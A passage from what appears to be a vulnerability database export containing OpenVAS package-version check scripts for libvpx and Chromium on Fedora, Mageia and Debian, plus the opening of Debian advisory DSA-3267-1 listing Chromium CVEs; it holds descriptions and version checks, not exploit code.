rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvpx\", rpm:\"libvpx~1.3.0~7.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:36", "description": "Mageia Linux Local Security Checks mgasa-2015-0249", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0249", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130127", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0249.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130127\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:43:02 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0249\");\n script_tag(name:\"insight\", value:\"libvpx before 1.4.0 allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data (CVE-2015-1258)\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0249.html\");\n script_cve_id(\"CVE-2015-1258\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0249\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"libvpx\", rpm:\"libvpx~1.3.0~3.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Fedora Update for libvpx FEDORA-2015-15935", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869991", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869991", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libvpx FEDORA-2015-15935\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869991\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 12:42:09 +0200 (Tue, 06 Oct 2015)\");\n script_cve_id(\"CVE-2015-1258\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libvpx FEDORA-2015-15935\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libvpx'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libvpx on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-15935\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-October/168803.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"libvpx\", rpm:\"libvpx~1.3.0~7.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:59", "description": "Mageia Linux Local Security Checks mgasa-2015-0288", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0288", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1288", "CVE-2015-1281", "CVE-2015-1263", "CVE-2015-1286", "CVE-2015-1289", "CVE-2015-1272", "CVE-2015-1279", "CVE-2015-1274", "CVE-2015-1287", "CVE-2015-1282", "CVE-2015-1285", "CVE-2015-1276", "CVE-2015-1278", "CVE-2015-1277", "CVE-2015-1271", "CVE-2015-1273", "CVE-2015-1280", "CVE-2015-1284"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130090", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130090", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0288.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130090\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:35 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0288\");\n script_tag(name:\"insight\", value:\"Chromium-browser 44.0.2403.107 fixes several security issues.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0288.html\");\n script_cve_id(\"CVE-2015-1271\", \"CVE-2015-1272\", \"CVE-2015-1273\", \"CVE-2015-1274\", \"CVE-2015-1276\", \"CVE-2015-1277\", \"CVE-2015-1278\", \"CVE-2015-1279\", \"CVE-2015-1280\", \"CVE-2015-1281\", \"CVE-2015-1282\", \"CVE-2015-1284\", \"CVE-2015-1285\", \"CVE-2015-1286\", \"CVE-2015-1287\", \"CVE-2015-1288\", \"CVE-2015-1289\", \"CVE-2015-1263\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0288\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"chromium-browser-stable\", rpm:\"chromium-browser-stable~44.0.2403.107~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:47", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1266\nIntended access restrictions could be bypassed for certain URLs like\nchrome://gpu.\n\nCVE-2015-1267\nA way to bypass the Same Origin Policy was discovered.\n\nCVE-2015-1268\nMariusz Mlynski also discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1269\nMike Rudy discovered that hostnames were not properly compared in the\nHTTP Strict Transport Policy and HTTP Public Key Pinning features,\nwhich could allow those access restrictions to be bypassed.\n\nCVE-2015-1270\nAtte Kettunen discovered an uninitialized memory read in the ICU library.\n\nCVE-2015-1271\ncloudfuzzer discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1272\nChamal de Silva discovered race conditions in the GPU process\nimplementation.\n\nCVE-2015-1273\nmakosoft discovered a buffer overflow in openjpeg, which is used by\nthe pdfium library embedded in chromium.\n\nCVE-2015-1274\nandrewm.bpi discovered that the auto-open list allowed certain file\ntypes to be executed immediately after download.\n\nCVE-2015-1276\nColin Payne discovered a use-after-free issue in the IndexedDB\nimplementation.\n\nCVE-2015-1277\nSkyLined discovered a use-after-free issue in chromium", "cvss3": {}, "published": "2015-07-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3315-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1266", "CVE-2015-1288", "CVE-2015-1281", "CVE-2015-1268", "CVE-2015-1263", "CVE-2015-1267", "CVE-2015-1286", "CVE-2015-1289", "CVE-2015-1270", "CVE-2015-1272", "CVE-2015-1283", "CVE-2015-1279", "CVE-2015-1274", "CVE-2015-1287", "CVE-2015-1282", "CVE-2015-1285", "CVE-2015-1276", "CVE-2015-1278", "CVE-2015-1269", "CVE-2015-1277", "CVE-2015-1271", "CVE-2015-1273", "CVE-2015-1280", "CVE-2015-1284"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703315", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703315", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3315.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3315-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703315\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-1263\", \"CVE-2015-1266\", \"CVE-2015-1267\", \"CVE-2015-1268\",\n \"CVE-2015-1269\", \"CVE-2015-1270\", \"CVE-2015-1271\", \"CVE-2015-1272\",\n \"CVE-2015-1273\", \"CVE-2015-1274\", \"CVE-2015-1276\", \"CVE-2015-1277\",\n \"CVE-2015-1278\", \"CVE-2015-1279\", \"CVE-2015-1280\", \"CVE-2015-1281\",\n \"CVE-2015-1282\", \"CVE-2015-1283\", \"CVE-2015-1284\", \"CVE-2015-1285\",\n \"CVE-2015-1286\", \"CVE-2015-1287\", \"CVE-2015-1288\", \"CVE-2015-1289\");\n script_name(\"Debian Security Advisory DSA 3315-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-23 00:00:00 +0200 (Thu, 23 Jul 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3315.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), these problems have been fixed in\nversion 44.0.2403.89-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 44.0.2403.89-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1266\nIntended access restrictions could be bypassed for certain URLs like\nchrome://gpu.\n\nCVE-2015-1267\nA way to bypass the Same Origin Policy was discovered.\n\nCVE-2015-1268\nMariusz Mlynski also discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1269\nMike Rudy discovered that hostnames were not properly compared in the\nHTTP Strict Transport Policy and HTTP Public Key Pinning features,\nwhich could allow those access restrictions to be bypassed.\n\nCVE-2015-1270\nAtte Kettunen discovered an uninitialized memory read in the ICU library.\n\nCVE-2015-1271\ncloudfuzzer discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1272\nChamal de Silva discovered race conditions in the GPU process\nimplementation.\n\nCVE-2015-1273\nmakosoft discovered a buffer overflow in openjpeg, which is used by\nthe pdfium library embedded in chromium.\n\nCVE-2015-1274\nandrewm.bpi discovered that the auto-open list allowed certain file\ntypes to be executed immediately after download.\n\nCVE-2015-1276\nColin Payne discovered a use-after-free issue in the IndexedDB\nimplementation.\n\nCVE-2015-1277\nSkyLined discovered a use-after-free issue in chromium's accessibility\nimplementation.\n\nCVE-2015-1278\nChamal de Silva discovered a way to use PDF documents to spoof a URL.\n\nCVE-2015-1279\nmlafon discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1280\ncloudfuzzer discovered a memory corruption issue in the SKIA library.\n\nCVE-2015-1281\nMasato Knugawa discovered a way to bypass the Content Security\nPolicy.\n\nCVE-2015-1282\nChamal de Silva discovered multiple use-after-free issues in the\npdfium library.\n\nCVE-2015-1283\nHuzaifa Sidhpurwala discovered a buffer overflow in the expat\nlibrary.\n\nCVE-2015-1284\nAtte Kettunen discovered that the maximum number of page frames\nwas not correctly checked.\n\nCVE-2015-1285\ngazheyes discovered an information leak in the XSS auditor,\nwhich normally helps to prevent certain classes of cross-site\nscripting problems.\n\nCVE-2015-1286\nA cross-site scripting issue was discovered in the interface to\nthe v8 javascript library.\n\nCVE-2015-1287\nfiledescriptor discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1288Mike Ruddy discovered that the spellchecking dictionaries could\nstill be downloaded over plain HTTP (related to CVE-2015-1263\n).\n\nCVE-2015-1289\nThe chrome 44 development team found and fixed various issues\nduring internal auditing.\n\nIn addition to the above issues, Google disabled the hotword extension\nby default in this version, which if enabled downloads files without\nthe user's intervention.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"44.0.2403.89-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium\", ver:\"44.0.2403.89-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"44.0.2403.89-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"44.0.2403.89-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"44.0.2403.89-1~deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:50", "description": "Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1266 \nIntended access restrictions could be bypassed for certain URLs like\nchrome://gpu.\n\nCVE-2015-1267 \nA way to bypass the Same Origin Policy was discovered.\n\nCVE-2015-1268 \nMariusz Mlynski also discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1269 \nMike Rudy discovered that hostnames were not properly compared in the\nHTTP Strict Transport Policy and HTTP Public Key Pinning features,\nwhich could allow those access restrictions to be bypassed.\n\nCVE-2015-1270 \nAtte Kettunen discovered an uninitialized memory read in the ICU library.\n\nCVE-2015-1271 \ncloudfuzzer discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1272 \nChamal de Silva discovered race conditions in the GPU process\nimplementation.\n\nCVE-2015-1273 \nmakosoft discovered a buffer overflow in openjpeg, which is used by\nthe pdfium library embedded in chromium.\n\nCVE-2015-1274 \nandrewm.bpi discovered that the auto-open list allowed certain file\ntypes to be executed immediately after download.\n\nCVE-2015-1276 \nColin Payne discovered a use-after-free issue in the IndexedDB\nimplementation.\n\nCVE-2015-1277 \nSkyLined discovered a use-after-free issue in chromium", "cvss3": {}, "published": "2015-07-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3315-1 (chromium-browser - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1266", "CVE-2015-1288", "CVE-2015-1281", "CVE-2015-1268", "CVE-2015-1263", "CVE-2015-1267", "CVE-2015-1286", "CVE-2015-1289", "CVE-2015-1270", "CVE-2015-1272", "CVE-2015-1283", "CVE-2015-1279", "CVE-2015-1274", "CVE-2015-1287", "CVE-2015-1282", "CVE-2015-1285", "CVE-2015-1276", "CVE-2015-1278", "CVE-2015-1269", "CVE-2015-1277", "CVE-2015-1271", "CVE-2015-1273", "CVE-2015-1280", "CVE-2015-1284"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703315", "href": "http://plugins.openvas.org/nasl.php?oid=703315", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3315.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3315-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703315);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-1263\", \"CVE-2015-1266\", \"CVE-2015-1267\", \"CVE-2015-1268\",\n \"CVE-2015-1269\", \"CVE-2015-1270\", \"CVE-2015-1271\", \"CVE-2015-1272\",\n \"CVE-2015-1273\", \"CVE-2015-1274\", \"CVE-2015-1276\", \"CVE-2015-1277\",\n \"CVE-2015-1278\", \"CVE-2015-1279\", \"CVE-2015-1280\", \"CVE-2015-1281\",\n \"CVE-2015-1282\", \"CVE-2015-1283\", \"CVE-2015-1284\", \"CVE-2015-1285\",\n \"CVE-2015-1286\", \"CVE-2015-1287\", \"CVE-2015-1288\", \"CVE-2015-1289\");\n script_name(\"Debian Security Advisory DSA 3315-1 (chromium-browser - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-07-23 00:00:00 +0200 (Thu, 23 Jul 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3315.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"chromium-browser on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), these problems have been fixed in\nversion 44.0.2403.89-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 44.0.2403.89-1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1266 \nIntended access restrictions could be bypassed for certain URLs like\nchrome://gpu.\n\nCVE-2015-1267 \nA way to bypass the Same Origin Policy was discovered.\n\nCVE-2015-1268 \nMariusz Mlynski also discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1269 \nMike Rudy discovered that hostnames were not properly compared in the\nHTTP Strict Transport Policy and HTTP Public Key Pinning features,\nwhich could allow those access restrictions to be bypassed.\n\nCVE-2015-1270 \nAtte Kettunen discovered an uninitialized memory read in the ICU library.\n\nCVE-2015-1271 \ncloudfuzzer discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1272 \nChamal de Silva discovered race conditions in the GPU process\nimplementation.\n\nCVE-2015-1273 \nmakosoft discovered a buffer overflow in openjpeg, which is used by\nthe pdfium library embedded in chromium.\n\nCVE-2015-1274 \nandrewm.bpi discovered that the auto-open list allowed certain file\ntypes to be executed immediately after download.\n\nCVE-2015-1276 \nColin Payne discovered a use-after-free issue in the IndexedDB\nimplementation.\n\nCVE-2015-1277 \nSkyLined discovered a use-after-free issue in chromium's accessibility\nimplementation.\n\nCVE-2015-1278 \nChamal de Silva discovered a way to use PDF documents to spoof a URL.\n\nCVE-2015-1279 \nmlafon discovered a buffer overflow in the pdfium library.\n\nCVE-2015-1280 \ncloudfuzzer discovered a memory corruption issue in the SKIA library.\n\nCVE-2015-1281 \nMasato Knugawa discovered a way to bypass the Content Security\nPolicy.\n\nCVE-2015-1282 \nChamal de Silva discovered multiple use-after-free issues in the\npdfium library.\n\nCVE-2015-1283 \nHuzaifa Sidhpurwala discovered a buffer overflow in the expat\nlibrary.\n\nCVE-2015-1284 \nAtte Kettunen discovered that the maximum number of page frames\nwas not correctly checked.\n\nCVE-2015-1285 \ngazheyes discovered an information leak in the XSS auditor,\nwhich normally helps to prevent certain classes of cross-site\nscripting problems.\n\nCVE-2015-1286 \nA cross-site scripting issue was discovered in the interface to\nthe v8 javascript library.\n\nCVE-2015-1287 \nfiledescriptor discovered a way to bypass the Same Origin Policy.\n\nCVE-2015-1288Mike Ruddy discovered that the spellchecking dictionaries could\nstill be downloaded over plain HTTP (related to CVE-2015-1263 \n).\n\nCVE-2015-1289 \nThe chrome 44 development team found and fixed various issues\nduring internal auditing.\n\nIn addition to the above issues, Google disabled the hotword extension\nby default in this version, which if enabled downloads files without\nthe user's intervention.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chromedriver\", ver:\"44.0.2403.89-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium\", ver:\"44.0.2403.89-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-dbg\", ver:\"44.0.2403.89-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-inspector\", ver:\"44.0.2403.89-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"44.0.2403.89-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2023-12-04T11:39:32", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3267-1 security@debian.org\nhttp://www.debian.org/security/ Michael Gilbert\nMay 22, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2015-1251 CVE-2015-1252 CVE-2015-1253 CVE-2015-1254\n CVE-2015-1255 CVE-2015-1256 CVE-2015-1257 CVE-2015-1258\n CVE-2015-1259 CVE-2015-1260 CVE-2015-1261 CVE-2015-1262\n CVE-2015-1263 CVE-2015-1264 CVE-2015-1265\n\nSeveral vulnerabilities were discovered in the chromium web browser.\n\nCVE-2015-1251\n\n SkyLined discovered a use-after-free issue in speech recognition.\n\nCVE-2015-1252\n\n An out-of-bounds write issue was discovered that could be used to\n escape from the sandbox.\n\nCVE-2015-1253\n\n A cross-origin bypass issue was discovered in the DOM parser.\n\nCVE-2015-1254\n\n A cross-origin bypass issue was discovered in the DOM editing feature.\n\nCVE-2015-1255\n\n 